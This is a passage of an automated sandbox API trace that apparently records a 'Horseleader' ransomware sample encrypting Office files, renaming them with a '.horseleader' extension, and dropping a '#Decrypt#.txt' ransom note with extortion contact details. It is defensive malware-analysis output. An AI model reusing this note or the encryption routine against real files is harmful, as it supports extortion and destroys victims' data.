lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.924] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.924] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.925] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.925] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0244.925] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0244.925] CloseHandle (hObject=0x1a4) returned 1 [0244.925] GetProcessHeap () returned 0x780000 [0244.925] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.926] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe.horseleader") returned 105 [0244.926] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\setup.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\setup.exe.horseleader")) returned 1 [0244.927] GetProcessHeap () returned 0x780000 [0244.927] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.927] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b66320, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50da17c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x50da17c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Visio.en-us", cAlternateFileName="VISIO~1.EN-")) returned 1 [0244.927] lstrcmpiW (lpString1="Visio.en-us", lpString2="Windows") returned -1 [0244.927] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us") returned 95 [0244.927] lstrcmpW (lpString1="Visio.en-us", lpString2=".") returned 1 [0244.927] lstrcmpW (lpString1="Visio.en-us", lpString2="..") returned 1 [0244.927] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.927] GetProcessHeap () returned 0x780000 [0244.927] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.927] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\*") returned 97 [0244.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b66320, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50da17c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x50da17c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.929] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.929] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\.") returned 97 [0244.930] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.930] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b66320, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50da17c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x50da17c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="..", cAlternateFileName="")) returned 1 [0244.930] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.930] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\..") returned 98 [0244.930] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.930] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.930] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43bdc500, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50da17c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.930] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.930] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 105 [0244.930] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.930] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.930] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.930] lstrlenW (lpString=".testttjffg") returned 11 [0244.930] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.930] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.930] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.931] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.935] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 105 [0244.935] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.935] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=6241) returned 1 [0244.935] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x1861, lpOverlapped=0x0) returned 1 [0244.937] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe79f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.937] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x1861, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x1861, lpOverlapped=0x0) returned 1 [0244.938] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.938] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.938] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.938] CloseHandle (hObject=0x15c) returned 1 [0244.938] GetProcessHeap () returned 0x780000 [0244.938] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.938] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.horseleader") returned 117 [0244.938] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.horseleader")) returned 1 [0244.939] GetProcessHeap () returned 0x780000 [0244.939] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.939] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4359ac00, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50b66320, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="VisioMUI.XML", cAlternateFileName="")) returned 1 [0244.940] lstrcmpiW (lpString1="VisioMUI.XML", lpString2="Windows") returned -1 [0244.940] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 108 [0244.940] StrStrIW (lpFirst="VisioMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.940] lstrcmpW (lpString1="VisioMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.940] lstrcmpW (lpString1="VisioMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.940] lstrlenW (lpString=".testttjffg") returned 11 [0244.940] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.940] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.940] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.940] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.942] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 108 [0244.942] StrStrW (lpFirst="VisioMUI.XML", lpSrch=".txt") returned 0x0 [0244.942] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=9503) returned 1 [0244.942] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x251f, lpOverlapped=0x0) returned 1 [0244.944] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffdae1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.944] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x251f, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x251f, lpOverlapped=0x0) returned 1 [0244.945] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.945] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.945] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.945] CloseHandle (hObject=0x15c) returned 1 [0244.945] GetProcessHeap () returned 0x780000 [0244.945] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.945] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.horseleader") returned 120 [0244.945] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.horseleader")) returned 1 [0244.946] GetProcessHeap () returned 0x780000 [0244.946] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.946] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4359ac00, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x50b66320, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="VisioMUI.XML", cAlternateFileName="")) returned 0 [0244.946] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.946] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\#Decrypt#.txt") returned 109 [0244.947] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.950] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.950] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.951] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.951] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.951] CloseHandle (hObject=0x1a4) returned 1 [0244.951] GetProcessHeap () returned 0x780000 [0244.951] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.951] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83258520, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x84c615c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x84c615c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="VISIOR", cAlternateFileName="")) returned 1 [0244.951] lstrcmpiW (lpString1="VISIOR", lpString2="Windows") returned -1 [0244.952] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR") returned 90 [0244.952] lstrcmpW (lpString1="VISIOR", lpString2=".") returned 1 [0244.952] lstrcmpW (lpString1="VISIOR", lpString2="..") returned 1 [0244.952] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.952] GetProcessHeap () returned 0x780000 [0244.952] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.952] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\*") returned 92 [0244.952] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83258520, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x84c615c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x84c615c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.952] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.953] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\.") returned 92 [0244.953] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.953] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83258520, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x84c615c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x84c615c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="..", cAlternateFileName="")) returned 1 [0244.953] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.953] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\..") returned 93 [0244.953] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.953] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.953] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a6d3200, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x84c615c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061, dwReserved0=0xb541d799, dwReserved1=0xec7654e2, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.953] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.953] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 100 [0244.953] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.953] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.953] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.953] lstrlenW (lpString=".testttjffg") returned 11 [0244.954] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.954] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.954] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: 